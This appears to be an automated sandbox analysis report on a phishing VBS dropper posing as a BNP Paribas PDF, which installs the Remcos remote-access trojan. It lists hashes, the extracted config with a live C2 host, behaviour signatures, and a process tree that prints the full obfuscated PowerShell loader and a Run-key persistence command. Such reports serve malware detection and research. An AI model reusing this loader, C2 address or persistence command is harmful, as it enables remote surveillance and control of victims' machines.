Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    07/04/2025, 13:15

General

  • Target

    BNPParibas,pdf.vbs

  • Size

    32KB

  • MD5

    dfc5b784b17dff57cbad43dbf6fb582d

  • SHA1

    addde7ad819450c10a67e39d8f49518821f6c296

  • SHA256

    bb453ff3ce310b04ecfe93ff0f3ad8edf939c81a0c94a30842e9404804a3fd64

  • SHA512

    81d57427dfc0b8703cb394e5444ec1dfa531f4a02e829c79f1dc623538a2ee0b57daa5b83ba66b9445b27736945f6ea6ca9c9620a0747783adac9719e0c9f49a

  • SSDEEP

    768:qeifDS82ZBNPMng2vSJiqB1uTmTFGLvM1o5nU4Yhtt:MfDiDNkzSJpracAM1GU4Yhtt

Malware Config

Extracted

Family

remcos

Botnet

megida

C2

latestrem.duckdns.org:52190

Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-I12ONC

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Remcos family
  • Blocklisted process makes network request 6 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\BNPParibas,pdf.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3924
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Get-Service;$Smaaskndes='func';Get-History;$Smaaskndes+='t';Get-History;$Smaaskndes+='i';$Bogladepriser=Get-History;$Smaaskndes+='on:';$Bogladepriser=Get-History;(ni -p $Smaaskndes -n Meandrite -value { param($Caponummeret);$Triumferes=1;do {$Urovarslingers+=$Caponummeret[$Triumferes];$Triumferes+=2} until(!$Caponummeret[$Triumferes])$Urovarslingers});(ni -p $Smaaskndes -n Comaens -value {param($Collapsar);.($Negroes) ($Collapsar)});ConvertTo-Html;$Mosen=Meandrite ' NFE,tK..W';$Mosen+=Meandrite 'PE bBCUlNICEun t';$Skrumples=Meandrite ' M onzJiAlLlMaA/';$Kasinoets=Meandrite 'FT lMsE1 2';$Apurpose=' [PnTeOtH.DsKE r V i CUeFPAO I.NTtSmBA nAAAGLeOrF]G:D: sAE c u,r iCtSyCpRRMO,T,o cSOMl =T$PKCA SHi nCOUE TRs';$Skrumples+=Meandrite ' 5O..0 (IW i nSdSo w sO AN T 1,0..K0 ;U WPiDnK6,4 ;B CxF6 4 ;D .r,v :T1W3N4 .S0R). ,GKeTcUk o,/E2D0 1 0 0C1 0,1 F iHrAeDf o.x,/ 1 3T4H.P0';$Undecyl=Meandrite 'Eu s,eCRp- aDgTesNPT';$Pickery=Meandrite ' h tHtSp sK: / /Sw.wCw . tEr.a nMsGp.a.r.eUnMcFiBaCq uViSl lAoNtUa.. cFlO/ RSiCt,h eS.RmPs i';$Foreknowledges=Meandrite ' >';$Negroes=Meandrite ' iBEKX';$Besnakkedes='Eure';$Shindig='\Svulsterne.Cau';Comaens (Meandrite 'S$ G L O b a l : dARHnU= $,E N V : AAPFP,D ARTDA +D$SSJhSiSn d,IGG');Comaens (Meandrite ' $ GSl OMBIAbL :GaFBCO nFN,eAMPECn t SKOWm R A AKD eDT.=A$ PBIWc k eLrDy .AS.p L iSt,( $JfPo rPE,k N.O.w lEEDd G.e sF)');Comaens (Meandrite $Apurpose);$Pickery=$abonnementsomraadet[0];$Diphyes=(Meandrite ' $FgLL o bSaUL.:VhIuMNSdSe sPL D.EPrMNUeDsF=DN eAw -Doyb jfetC tD HSNyPs.TSESmZ.O$LMUO sPE n');Comaens ($Diphyes);Comaens (Meandrite 'V$,H uFnPd eHsDl dGeBrNnBe sH. HPeSa d,eOr sR[S$RU nSd eRcBy,l ]U= $HS kBr,u.m,pPlSeTs');$Materializee=Meandrite 'FD o wLnWlUo a dTF i lne';$Planck=Meandrite 'U$RHnuInDd eGs lEdWe rLnIe,sF. $KM a t e,rPiBaTl i.z e e .NIHn vFo kPe (Y$PP iRc.kHe r,yA,O$.sSaTa s.)';$saas=$Drn;Comaens (Meandrite 'B$FgSlUO BJA lD: NLO nLoLBFSHE rTVFaKtSIFOSN,=D(TtFE.SSTa-NPHA T H $ s AEA sB)');while (!$Nonobservation) {Comaens (Meandrite 'S$ gGl.oWbFaFl :SO tfo n e uSr o lAoMgHyX=E$,U.dGf,aBlSd sFvIiPn kcl e rUn e s') ;Comaens $Planck;Comaens (Meandrite 't[ t HLrSeEACd,IBN g . t H rTE a dM].:H:,SDLPeREPPG(.4 0 0B0K)');Comaens (Meandrite ' $,gAlSoTb A lN:.N OCNRo b S E R.VVA Tsi oKn =v( tGeKs td- p a TRH P$LS aIA SB)') ;Comaens (Meandrite 'A$PGBlAODBhaML :UogvDEfr S TBR EAG = $SgOl oGB a lz: B R n D E h u,gRgreNR NMEV+u+E%S$ ASb.OAnLn ESmLePNUT s OBm rBAKa,d ERT .Pc O,u NDT') ;$Pickery=$abonnementsomraadet[$Overstreg]}$Fibrocartilaginous=384348;$Brnebegrnsnings=27779;Comaens (Meandrite ' $ GSlmOJB,A Ls: E,u cDh a.R iDS t,i CAaTlFlQYV H= gTE T.- C ODN ttETn,TV B$ sSA.A,s');Comaens (Meandrite 'H$AgFlBoEbHa l :UTBj rUnSeT =G [,S ySsMt eLmC. C ojnUv eSrPt ] : :LFUr oAm,BVa,s eN6U4 S tRr i,n,gt(d$ E uIc h,aVr iSsGt i c a.lGl y )');Comaens (Meandrite 'B$ g LIo B a l : g uIN sDtCi.g e.rSe T=. T[SS.Y sMTREHM..LtUESx T .iE N cHoTd iUnUg,]E:.:Ea,S cMI,iS.Ug.E T S t RKISNHg (.$,TUJ R n E )');Comaens (Meandrite 'S$ gSLSO,bSA l :OWSoNr KNYK= $PG UbNPs.T I g e r EG.Es U b.s T r iONMGO(S$Tf IBb.rSoMcAA rSTdIUlKa.g iKn OMu s ,S$KBarBnPeIb e g RSn s.N i nTg S,)');Comaens $Worky;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4044
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Get-Service;$Smaaskndes='func';Get-History;$Smaaskndes+='t';Get-History;$Smaaskndes+='i';$Bogladepriser=Get-History;$Smaaskndes+='on:';$Bogladepriser=Get-History;(ni -p $Smaaskndes -n Meandrite -value { param($Caponummeret);$Triumferes=1;do {$Urovarslingers+=$Caponummeret[$Triumferes];$Triumferes+=2} until(!$Caponummeret[$Triumferes])$Urovarslingers});(ni -p $Smaaskndes -n Comaens -value {param($Collapsar);.($Negroes) ($Collapsar)});ConvertTo-Html;$Mosen=Meandrite ' NFE,tK..W';$Mosen+=Meandrite 'PE bBCUlNICEun t';$Skrumples=Meandrite ' M onzJiAlLlMaA/';$Kasinoets=Meandrite 'FT lMsE1 2';$Apurpose=' [PnTeOtH.DsKE r V i CUeFPAO I.NTtSmBA nAAAGLeOrF]G:D: sAE c u,r iCtSyCpRRMO,T,o cSOMl =T$PKCA SHi nCOUE TRs';$Skrumples+=Meandrite ' 5O..0 (IW i nSdSo w sO AN T 1,0..K0 ;U WPiDnK6,4 ;B CxF6 4 ;D .r,v :T1W3N4 .S0R). ,GKeTcUk o,/E2D0 1 0 0C1 0,1 F iHrAeDf o.x,/ 1 3T4H.P0';$Undecyl=Meandrite 'Eu s,eCRp- aDgTesNPT';$Pickery=Meandrite ' h tHtSp sK: / /Sw.wCw . tEr.a nMsGp.a.r.eUnMcFiBaCq uViSl lAoNtUa.. cFlO/ RSiCt,h eS.RmPs i';$Foreknowledges=Meandrite ' >';$Negroes=Meandrite ' iBEKX';$Besnakkedes='Eure';$Shindig='\Svulsterne.Cau';Comaens (Meandrite 'S$ G L O b a l : dARHnU= $,E N V : AAPFP,D ARTDA +D$SSJhSiSn d,IGG');Comaens (Meandrite ' $ GSl OMBIAbL :GaFBCO nFN,eAMPECn t SKOWm R A AKD eDT.=A$ PBIWc k eLrDy .AS.p L iSt,( $JfPo rPE,k N.O.w lEEDd G.e sF)');Comaens (Meandrite $Apurpose);$Pickery=$abonnementsomraadet[0];$Diphyes=(Meandrite ' $FgLL o bSaUL.:VhIuMNSdSe sPL D.EPrMNUeDsF=DN eAw -Doyb jfetC tD HSNyPs.TSESmZ.O$LMUO sPE n');Comaens ($Diphyes);Comaens (Meandrite 'V$,H uFnPd eHsDl dGeBrNnBe sH. HPeSa d,eOr sR[S$RU nSd eRcBy,l ]U= $HS kBr,u.m,pPlSeTs');$Materializee=Meandrite 'FD o wLnWlUo a dTF i lne';$Planck=Meandrite 'U$RHnuInDd eGs lEdWe rLnIe,sF. $KM a t e,rPiBaTl i.z e e .NIHn vFo kPe (Y$PP iRc.kHe r,yA,O$.sSaTa s.)';$saas=$Drn;Comaens (Meandrite 'B$FgSlUO BJA lD: NLO nLoLBFSHE rTVFaKtSIFOSN,=D(TtFE.SSTa-NPHA T H $ s AEA sB)');while (!$Nonobservation) {Comaens (Meandrite 'S$ gGl.oWbFaFl :SO tfo n e uSr o lAoMgHyX=E$,U.dGf,aBlSd sFvIiPn kcl e rUn e s') ;Comaens $Planck;Comaens (Meandrite 't[ t HLrSeEACd,IBN g . t H rTE a dM].:H:,SDLPeREPPG(.4 0 0B0K)');Comaens (Meandrite ' $,gAlSoTb A lN:.N OCNRo b S E R.VVA Tsi oKn =v( tGeKs td- p a TRH P$LS aIA SB)') ;Comaens (Meandrite 'A$PGBlAODBhaML :UogvDEfr S TBR EAG = $SgOl oGB a lz: B R n D E h u,gRgreNR NMEV+u+E%S$ ASb.OAnLn ESmLePNUT s OBm rBAKa,d ERT .Pc O,u NDT') ;$Pickery=$abonnementsomraadet[$Overstreg]}$Fibrocartilaginous=384348;$Brnebegrnsnings=27779;Comaens (Meandrite ' $ GSlmOJB,A Ls: E,u cDh a.R iDS t,i CAaTlFlQYV H= gTE T.- C ODN ttETn,TV B$ sSA.A,s');Comaens (Meandrite 'H$AgFlBoEbHa l :UTBj rUnSeT =G [,S ySsMt eLmC. C ojnUv eSrPt ] : :LFUr oAm,BVa,s eN6U4 S tRr i,n,gt(d$ E uIc h,aVr iSsGt i c a.lGl y )');Comaens (Meandrite 'B$ g LIo B a l : g uIN sDtCi.g e.rSe T=. T[SS.Y sMTREHM..LtUESx T .iE N cHoTd iUnUg,]E:.:Ea,S cMI,iS.Ug.E T S t RKISNHg (.$,TUJ R n E )');Comaens (Meandrite 'S$ gSLSO,bSA l :OWSoNr KNYK= $PG UbNPs.T I g e r EG.Es U b.s T r iONMGO(S$Tf IBb.rSoMcAA rSTdIUlKa.g iKn OMu s ,S$KBarBnPeIb e g RSn s.N i nTg S,)');Comaens $Worky;"
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:840
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2444
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Jorddag" /t REG_EXPAND_SZ /d "%Rdlg% -windowstyle 1 $Skbnefllesskab=(gi 'HKCU:\Software\Unglowering\').GetValue('Rawlplug');%Rdlg% ($Skbnefllesskab)"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2408
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Jorddag" /t REG_EXPAND_SZ /d "%Rdlg% -windowstyle 1 $Skbnefllesskab=(gi 'HKCU:\Software\Unglowering\').GetValue('Rawlplug');%Rdlg% ($Skbnefllesskab)"
          4⤵
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          PID:2984

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\remcos\logs.dat

    Filesize

    144B

    MD5

    c98f72ed7dd54865cd0306b793a7d6aa

    SHA1

    d4f423f966891936cf37962ff4d6f31b6dddf61b

    SHA256

    3c32f54be55a006fcc6c955a1c3476d9988a60406d83e7f173b59403471b5d3e

    SHA512

    c8077c49b775a49e14a0c9ed2009484df593db75eaafc92a97080359028781130feb229679306e7476a950b09edd17243d0dd547f602af27ca49d6a6a19fc20a

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    8b75b189b3549c4748b9d6f6a789b979

    SHA1

    4fc3787e1e7521263c11cb7be1b7efb325a154ef

    SHA256

    186c84d2569a552ee33c7f700fd90646467cc59462531db882b9babe85cfe5a5

    SHA512

    229085da103c62153081cc76b1cf933224386420a527de92260c00518e67966b493484da5a8fb813b9e9f71dd210c0ff39e7cb8ae7139289d7c305fc60b59766

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_eflgunrl.ne2.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Roaming\Svulsterne.Cau

    Filesize

    536KB

    MD5

    b627c1952693e488e514ffb92633e80b

    SHA1

    7aca9e0681ffd7895b3b933a7de9a4b644d3b62d

    SHA256

    28505c5221958bcd1501c44f2cfe8556a99384177e76bb51064733f0521be2ce

    SHA512

    42aa53d79d549a005b4eef4fb6db28505f61576776c6b1649a4a0842f97d21a9385a1aca18d6dd5041b44ef6ba4bbc8bb4c5ed17dd351fbf1b26c91b82392858

  • memory/840-46-0x0000000006550000-0x0000000006572000-memory.dmp

    Filesize

    136KB

  • memory/840-36-0x00000000059A0000-0x0000000005CF4000-memory.dmp

    Filesize

    3.3MB

  • memory/840-50-0x0000000008B10000-0x000000000DA88000-memory.dmp

    Filesize

    79.5MB

  • memory/840-48-0x0000000008490000-0x0000000008B0A000-memory.dmp

    Filesize

    6.5MB

  • memory/840-47-0x0000000007860000-0x0000000007E04000-memory.dmp

    Filesize

    5.6MB

  • memory/840-45-0x0000000006500000-0x000000000651A000-memory.dmp

    Filesize

    104KB

  • memory/840-26-0x00000000026B0000-0x00000000026E6000-memory.dmp

    Filesize

    216KB

  • memory/840-27-0x00000000052F0000-0x0000000005918000-memory.dmp

    Filesize

    6.2MB

  • memory/840-28-0x0000000005120000-0x0000000005142000-memory.dmp

    Filesize

    136KB

  • memory/840-30-0x0000000005240000-0x00000000052A6000-memory.dmp

    Filesize

    408KB

  • memory/840-29-0x00000000051D0000-0x0000000005236000-memory.dmp

    Filesize

    408KB

  • memory/840-44-0x00000000071E0000-0x0000000007276000-memory.dmp

    Filesize

    600KB

  • memory/840-43-0x0000000006020000-0x000000000606C000-memory.dmp

    Filesize

    304KB

  • memory/840-42-0x0000000005FF0000-0x000000000600E000-memory.dmp

    Filesize

    120KB

  • memory/2444-54-0x0000000000670000-0x00000000018C4000-memory.dmp

    Filesize

    18.3MB

  • memory/4044-16-0x00007FFEC01E0000-0x00007FFEC0CA1000-memory.dmp

    Filesize

    10.8MB

  • memory/4044-18-0x00007FFEC01E3000-0x00007FFEC01E5000-memory.dmp

    Filesize

    8KB

  • memory/4044-25-0x00007FFEC01E0000-0x00007FFEC0CA1000-memory.dmp

    Filesize

    10.8MB

  • memory/4044-4-0x00007FFEC01E3000-0x00007FFEC01E5000-memory.dmp

    Filesize

    8KB

  • memory/4044-24-0x00007FFEC01E0000-0x00007FFEC0CA1000-memory.dmp

    Filesize

    10.8MB

  • memory/4044-21-0x00007FFEC01E0000-0x00007FFEC0CA1000-memory.dmp

    Filesize

    10.8MB

  • memory/4044-15-0x00007FFEC01E0000-0x00007FFEC0CA1000-memory.dmp

    Filesize

    10.8MB

  • memory/4044-20-0x00007FFEC01E0000-0x00007FFEC0CA1000-memory.dmp

    Filesize

    10.8MB

  • memory/4044-14-0x000001C16ED90000-0x000001C16EDB2000-memory.dmp

    Filesize

    136KB